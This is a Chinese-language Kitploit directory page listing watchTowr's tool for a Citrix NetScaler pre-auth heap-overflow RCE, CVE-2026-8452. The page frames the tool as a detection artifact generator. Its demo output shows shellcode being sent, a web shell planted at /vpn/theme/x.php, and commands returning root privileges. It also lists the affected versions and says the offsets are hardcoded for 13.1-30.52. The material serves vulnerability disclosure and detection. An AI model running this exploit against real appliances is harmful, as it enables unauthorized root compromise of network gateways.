Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
watchTowr-vs-Citrix-Netscaler-PreAuth-RCE-CVE-2026-8452 — CVE-2026-8452 预认证远程代码执行(PreAuth RCE) | Kitploit
工具/GitHubGitHub/watchtowrlabs/watchtowr-vs-citrix-netscaler-preauth-rce-cve-2026-8452
漏洞分析漏洞利用Web应用程序漏洞利用红队Shellcode 生成Payload 开发
GitHubwatchtowrlabs/watchtowr-vs-citrix-netscaler-preauth-rce-cve-2026-8452

watchTowr-vs-Citrix-Netscaler-PreAuth-RCE-CVE-2026-8452

CVE-2026-8452 预认证远程代码执行(PreAuth RCE)

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
61151026天前Kitploit 审核通过
分享

watchTowr-vs-Citrix-Netscaler-PreAuth-RCE

用于 Citrix NetScaler CVE-2026-8452 的检测产物生成器

技术细节请参阅我们的博客文章。

检测演示

root@kitploit:~
python3 watchTowr-vs-Citrix-Netscaler-PreAuth-RCE.py --target https://172.16.5.12:9443/
                     __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                          \/          \/     \/

        watchTowr-vs-Citrix-Netscaler-PreAuth-RCE.py

        (*) Citrix NetScaler PreAuth Heap overflow to RCE Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2026-8452]

[*] Connecting to endpoint...
[*] target AAA service is responsive
[*] building shellcode
[+] shellcode size: 268 bytes
[*] triggering jmp rax to 0x112d30180
[*] sent..
[+] webshell will be at https://172.16.5.12:9443/vpn/theme/x.php?0=uname+-a;id
[+] web shell output:


FreeBSD something 11.4-NETSCALER-13.1 FreeBSD 11.4-NETSCALER-13.1 #0 ef731ca813f0(heads/artesa_30_52)-dirty: Wed Aug 24 08:24:55 PDT 2022     root@sjc-bld-bsd114-215:/usr/obj/usr/home/build/adc/usr.src/sys/NS64  amd64
uid=65534(nobody) gid=65534(nobody) euid=0(root) egid=0(wheel) groups=0(wheel)
uid=65534(nobody) gid=65534(nobody) euid=0(root) egid=0(wheel) groups=0(wheel)

所有偏移量/地址均针对 NetScaler 13.1-30.52 版本硬编码。

受影响版本

当 NetScaler 设备配置为使用 SAML 作为服务提供商(SP)或身份提供商(IdP)时,该漏洞可达。

Citrix 将以下版本列为受影响版本:

NetScaler ADC 和 NetScaler Gateway 14.1,早于 14.1-72.61 的版本 NetScaler ADC 和 NetScaler Gateway 13.1,早于 13.1-63.18 的版本

关注 watchTowr 实验室

如需获取最新安全研究,请关注 watchTowr 实验室团队

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
下载工具